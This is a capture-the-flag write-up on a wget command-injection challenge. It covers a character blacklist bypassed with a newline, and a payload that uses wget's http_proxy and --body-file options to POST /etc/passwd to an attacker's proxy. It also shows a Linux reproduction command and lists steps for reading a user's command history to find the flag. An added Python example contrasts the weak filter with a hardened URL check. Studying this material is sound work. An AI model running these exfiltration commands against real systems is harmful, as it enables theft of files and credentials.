Challenge description
The challenge has only three routes and a single input point, so it is easy to see that the theme is command injection. You therefore need to keep sending test data and refreshing the page to watch the echoed output, in order to guess how the backend concatenates the wget command and what it filters.
For details, see the official write-up of the 2021 深育杯 (Shenyu Cup) online preliminary round.
Filtered characters
Fuzzing shows that spaces and semicolons cannot be used; by the same test, the backtick, |, ; and & are all filtered into spaces. It also shows that a \n character survives and can be used to bypass the regular-expression validity check.
Command concatenation
Because the special symbols are replaced with spaces, semicolons are used in place of spaces to join the command.
The http_proxy setting points wget at the proxy machine's IP and port; --method=POST and --body-file read a local file and send its contents with a POST request to that proxy server.
payload: -e;http_proxy=http://ip:port/;--method=POST;--body-file=/etc/passwd;\nwww.baidu.com
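Why the character blacklist fails and how a fix looks, as an added example (not the challenge's source; the filter is reconstructed from the description above and the hardened builder is an assumption of how the route could be written): the replacement filter leaves the newline intact and still lets the input be parsed as wget options, whereas an allow-list URL check plus an argv list (no shell string) rejects both.

```python
import re
from urllib.parse import urlsplit

# Blacklist as described in the write-up (reconstructed, not the real source):
# every listed character is turned into a space, nothing else is touched.
BLACKLISTED = (" ", ";", "|", "&", "`")


def weak_filter(user_input: str) -> str:
    """Return the input with blacklisted characters replaced by spaces.

    A newline is not on the list, so it passes through unchanged, and a
    leading '-' is never rejected, so wget still sees the text as options.
    """
    for ch in BLACKLISTED:
        user_input = user_input.replace(ch, " ")
    return user_input


# Hardened variant: validate the URL against an allow-list instead of
# stripping characters, and hand wget an argument vector so no shell
# parses the value and no part of it can become an option.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?$")
_CONTROL_OR_SPACE_RE = re.compile(r"[\s\x00-\x1f\x7f]")


def build_wget_argv(user_input: str) -> list:
    """Return ['wget', '--', url] for an acceptable URL, else raise ValueError."""
    if _CONTROL_OR_SPACE_RE.search(user_input):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(user_input)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http and https URLs are allowed")
    if not _HOST_RE.match(parts.netloc):
        raise ValueError("host must be a plain hostname with optional port")
    # "--" ends option parsing, so the URL can never be read as a wget flag.
    return ["wget", "--", user_input]
```

Run the returned list with subprocess.run(argv) rather than a shell string; the list form is what keeps the newline and option tricks from being interpreted.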
Reproducing on Linux
Reading the /etc/passwd file
Command: wget -e http_proxy=ip:port/ --method=POST --body-file=/etc/passwd \nwww.baidu.com
Viewing the user's command history
The original challenge looks at the command history of the ctf_usr user
Using the history to obtain the name of the web root directory
Using the obtained directory to read the directory's contents
Including the flag file in that directory to obtain the flag
Explanation of the commands in the payload
About Wgetrc commands
wget -e executes a .wgetrc command; a .wgetrc command is really a list of settings
See section 6.3 Wgetrc Commands of the official wget documentation directly
There you can find the ones used in the challenge, such as:
Sending a value or a file via POST:
post_data = string
Use POST as the method for all HTTP requests and send string in the request body. The same as ‘--post-data=string’.
post_file = file
Use POST as the method for all HTTP requests and send the contents of file in the request body. The same as ‘--post-file=file’.
Setting the proxy server:
http_proxy = string
Use string as HTTP proxy, instead of the one specified in environment.
Also, under section 2.7 HTTP Options of the official wget documentation:
Setting the request method:
‘--method=HTTP-Method’
Setting the request body:
‘--body-data=Data-String’
‘--body-file=Data-File’
Must be set when additional data needs to be sent to the server along with the Method specified using ‘--method’. ‘--body-data’ sends string as data, whereas ‘--body-file’ sends the contents of file. Other than that, they work in exactly the same way.
Currently, ‘--body-file’ is not for transmitting files as a whole. Wget does not currently support multipart/form-data for transmitting data; only application/x-www-form-urlencoded. In the future, this may be changed so that wget sends the ‘--body-file’ as a complete file instead of sending its contents to the server. Please be aware that Wget needs to know the contents of BODY Data in advance, and hence the argument to ‘--body-file’ should be a regular file. See ‘--post-file’ for a more detailed explanation. Only one of ‘--body-data’ and ‘--body-file’ should be specified.
Note: when --body-data or --body-file is set, the request method must also be set, otherwise wget refuses to run:
┌──(lrt㉿kali)-[~/桌面]
└─$ wget -e http_proxy=192.168.153.139:7070 --body-file=/etc/passwd www.baidu.com
使用 --body-data 或 --body-file 参数时必须通过 --method=HTTPMethod 指定一个传输方式。